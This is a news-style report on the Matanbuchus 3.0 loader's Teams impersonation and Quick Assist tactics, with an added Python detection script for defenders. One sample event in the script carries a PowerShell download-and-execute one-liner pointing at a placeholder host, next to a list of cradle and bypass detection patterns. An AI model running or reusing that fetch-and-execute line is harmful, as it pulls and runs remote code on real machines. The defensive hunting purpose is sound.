Cybersecurity Researchers Uncover Advanced Matanbuchus 3.0 Malware Targeting Microsoft Teams

Cybersecurity researchers have flagged an advanced variant of a known malware loader dubbed Matanbuchus, which enhances its stealth features to avoid detection. This latest version, known as Matanbuchus 3.0, operates as a malware-as-a-service (MaaS) and serves as a conduit for subsequent payloads such as Cobalt Strike beacons and ransomware.

Initially advertised in February 2021 for a rental price of $2,500 on Russian-speaking cybercrime forums, Matanbuchus has since evolved to include sophisticated social engineering techniques to trick users into executing malicious software. Unlike many typical malware variants that spread via spam emails and drive-by downloads, Matanbuchus often requires a hands-on approach, directly targeting victims with impersonation tactics. In some incidents, these loaders facilitate initial access for brokers who sell access to ransomware groups, making them more coordinated than commodity loaders.

According to cybersecurity firm Morphisec, the latest incarnation of the malware has been linked to incidents in which attackers placed external Microsoft Teams calls while impersonating IT help desk staff. The targeted employees were talked into launching Quick Assist and granting the caller remote access; once connected, the attacker ran a PowerShell script that deployed the Matanbuchus loader. The same Teams-plus-Quick Assist pretext has previously been used by threat actors associated with the Black Basta ransomware operation.
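The chain above (Quick Assist session, then a PowerShell download-and-execute one-liner on the same host) is something a SOC can look for in process-creation telemetry. The following Python is an added example written for this page; it is not from the Morphisec report or the article. It assumes a simplified event schema (`ts`, `host`, `image`, `cmdline`) and uses constructed sample events; the regexes are a heuristic, not an authoritative indicator list for Matanbuchus.

```python
"""Flag PowerShell launched shortly after Quick Assist on the same host.

Added example, not from the Morphisec report. Heuristic: a Quick Assist
process start followed within a time window by powershell.exe / pwsh.exe
carrying two or more download-cradle, encoded-command, hidden-window or
policy-bypass switches. The event fields and paths below are constructed.
"""
from __future__ import annotations

import re
from datetime import datetime

# Command-line patterns typical of download-and-execute one-liners.
# Matched case-insensitively against the whitespace-normalised command line.
SUSPICIOUS_PS_PATTERNS = {
    "encoded_command": r"-enc(odedcommand)?\b",
    "download_cradle": r"downloadstring|downloadfile|invoke-webrequest",
    "invoke_expression": r"invoke-expression|\biex\b",
    "hidden_window": r"-w(indowstyle)?\s+hidden",
    "no_profile": r"-nop(rofile)?\b",
    "policy_bypass": r"-e(xecution)?p(olicy)?\s+bypass",
}

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2025-07-10T09:14:02", "host": "WS-101",
     "image": r"C:\Windows\System32\QuickAssist.exe", "cmdline": "QuickAssist.exe"},
    {"ts": "2025-07-10T09:21:40", "host": "WS-101",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                ".DownloadString('http://example.invalid/stage')\""},
    {"ts": "2025-07-10T09:30:00", "host": "WS-205",  # admin script, no Quick Assist
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"ts": "2025-07-10T10:00:00", "host": "WS-310",
     "image": r"C:\Windows\System32\QuickAssist.exe", "cmdline": "QuickAssist.exe"},
    {"ts": "2025-07-10T10:03:00", "host": "WS-310",  # benign: no suspicious switches
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Date"},
    {"ts": "2025-07-10T11:05:00", "host": "WS-101",  # outside the window
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service"},
]


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_flags(cmdline: str) -> list[str]:
    """Names of the suspicious patterns present in a PowerShell command line."""
    lowered = " ".join(cmdline.lower().split())
    return [name for name, pat in SUSPICIOUS_PS_PATTERNS.items()
            if re.search(pat, lowered)]


def detect(events: list[dict], window_minutes: int = 30, min_flags: int = 2) -> list[dict]:
    """Return one alert per PowerShell start that follows Quick Assist on the same host.

    Events are sorted by time; the most recent Quick Assist start per host is
    remembered and compared against each subsequent PowerShell launch.
    """
    ordered = sorted(
        ({**e, "ts": datetime.fromisoformat(e["ts"])} for e in events),
        key=lambda e: e["ts"],
    )
    last_quick_assist: dict[str, datetime] = {}
    alerts: list[dict] = []
    for e in ordered:
        name = basename(e["image"])
        if name == "quickassist.exe":
            last_quick_assist[e["host"]] = e["ts"]
            continue
        if name not in ("powershell.exe", "pwsh.exe"):
            continue
        qa_ts = last_quick_assist.get(e["host"])
        if qa_ts is None:
            continue
        delta_min = (e["ts"] - qa_ts).total_seconds() / 60
        if delta_min > window_minutes:
            continue
        flags = suspicious_flags(e["cmdline"])
        if len(flags) >= min_flags:
            alerts.append({
                "host": e["host"],
                "ts": e["ts"].isoformat(),
                "minutes_after_quick_assist": round(delta_min, 1),
                "flags": flags,
                "cmdline": e["cmdline"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The window and the two-flag threshold are tuning knobs: help desks that legitimately use Quick Assist and then run scripted fixes will generate hits, so in practice this rule is better as a hunting query or a medium-severity correlation than a blocking control.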

Matanbuchus 3.0 distinguishes itself with improved C2 communication protocols, in-memory execution, and enhanced obfuscation. The loader supports CMD and PowerShell reverse shells and can run next-stage DLL, EXE, and shellcode payloads. Its advanced versions are reportedly marketed for as much as $15,000.

Before contacting its command-and-control (C2) server for additional payloads, the loader collects system information, scans running processes for security tools, and checks whether it holds administrative privileges. Researchers also note that the developers have incorporated intricate scheduling techniques, a significant evolution of the Matanbuchus framework that raises the risk it poses once it is running inside a compromised environment. The rise of stealth-first loaders like Matanbuchus underlines the growing abuse of enterprise collaboration platforms such as Microsoft Teams and Zoom as initial-access channels.